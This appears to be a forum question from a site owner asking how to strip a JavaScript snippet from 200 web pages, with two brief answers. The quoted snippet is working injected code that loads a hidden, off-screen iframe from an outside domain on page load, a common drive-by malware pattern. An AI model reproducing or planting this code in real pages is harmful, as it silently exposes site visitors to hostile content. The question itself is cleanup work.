# I want to remove following script from 200 page

Tags: javascript, linux, removeall

Is there any Linux command to remove the following script from all 200 pages in our website?

```
function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://yankeeyiddos.com/media/index.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd;
```

First we want find and then remove from pages. We tried with sed command but that did not work.

Answer (score 0):

Why are you trying to remove it with command ? The normal text editor or the dreamweaver can do it easily . Also you can tell it the start parameter and the end parameter with Regex in dream. Only needed to do that select the main folder and all files

Answer (score 0):

The easiest way would be to remove the script from the template you use to generate the 200 pages. You did not type them in one by one, did you? Also, consider using `<link>` and an external `.js` file to load the javascript that is common for more than one page.